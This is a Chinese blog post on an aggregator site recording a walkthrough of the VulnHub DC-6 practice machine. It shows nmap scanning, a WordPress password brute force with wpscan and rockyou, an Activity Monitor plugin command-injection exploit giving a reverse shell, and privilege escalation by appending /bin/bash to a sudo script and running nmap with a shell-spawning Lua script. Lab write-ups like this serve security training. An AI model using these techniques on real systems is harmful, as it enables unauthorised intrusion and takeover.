IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> vulnhub-DC-6靶机渗透记录 -> 正文阅读

[PHP知识库]vulnhub-DC-6靶机渗透记录

准备

kail IP: 192.168.178.160
dc-6 IP: 未知

信息收集

nmap -sS 192.168.178.160/24

在这里插入图片描述
确定靶机IP为192.168.178.161,接下来看看还有没有其他的开放端口

nmap -sV -v 192.168.178.161

在这里插入图片描述
访问80端口,访问的时候因为会直接跳转到wordy界面,所以在hosts文件中添加ip地址,才能正常访问,发现是wordpress框架
在这里插入图片描述
知道是wordpress框架,那就是知道辽后台登陆界面啦
http://wordy/wp-login.php
接下来就是要寻找用户名和密码

利用wpscan来进行爆破

使用wpscan来对网站进行枚举用户名
在这里插入图片描述

将得到的用户名保存到users.txt文件中
按照常规思路接下来用cewl来进爬字典,然后用wpscan来进行爆破,结果发现不行捏
重新打开dc-6的官网发现有一段线索
在这里插入图片描述

说明我们需要用这里面的字典进行暴力破解
进入到/usr/share/wordlists,查看当前目录,发现这个字典是需要解压的

cd /usr/share/wordlists
cp rockyou.txt.gz rockyou.txt.gz.bak
gunzip rockyou.txt.gz rockyou.txt

在这里插入图片描述
读取password文档,将其中的密码保存到桌面保存为pwd.txt
下面还是用wpscan来进行爆破

wpscan --url wordy users.txt -P pwd.txt

在这里插入图片描述
得到用户名mark,密码是helpdesk01
登录,随便看看有什么可利用的
在这里插入图片描述

反弹shell

方法一

发现存在一个插件Activity monitor,使用kali搜索这个插件是否存在漏洞

searchsploits Activity monitor

可以看到是存在漏洞的
在这里插入图片描述
将这个html页面拷到桌面上更名为dc-6.html

cp /usr/share/exploitdb/exploits/php/webapps/45274.html dc-6.html

查看里面的内容,发现存在命令执行漏洞,修改action里面的部分内容,保存并退出
在这里插入图片描述
使用kali开启临时的web服务
在这里插入图片描述
另外一个终端开启9999监听
在这里插入图片描述
直接用kail里面的浏览器kail IP的8000端口,然后点击dc-6.html,点击按钮
在这里插入图片描述
在这里插入图片描述
反弹成功,切换外壳
在这里插入图片描述

方法一

进入后台管理界面,点击插件的tools界面
在这里插入图片描述

点击lookup,bp抓包改包
在这里插入图片描述
在kail中开启监听端口9999,发包,反弹shell成功
在这里插入图片描述

权限提升

在home的mark中stuff中发现提示文档
在这里插入图片描述

给出了用户grahamd的密码GSo7isUM1D4,那必定是使用ssh来进行登录了
在这里插入图片描述
查看当前权限
在这里插入图片描述
发现可以用户jens目录下有一个可执行文件
在这里插入图片描述

修改脚本,在末尾增加/bin/bash,并以jens用户来执行文件(上面已经知道无需密码了)

echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh

成功切换到jens用户,查看当前权限
在这里插入图片描述
提示了nmap(nmap版本是7.4)

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

切换外壳

python -c ‘import pty;pty.spawn(“bin/bash”)’

成功拿到shell
在这里插入图片描述

参考:
https://www.cnblogs.com/sym945/p/13915114.html

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-09-13 10:54:09  更:2022-09-13 10:54:16 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/5 9:27:24-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码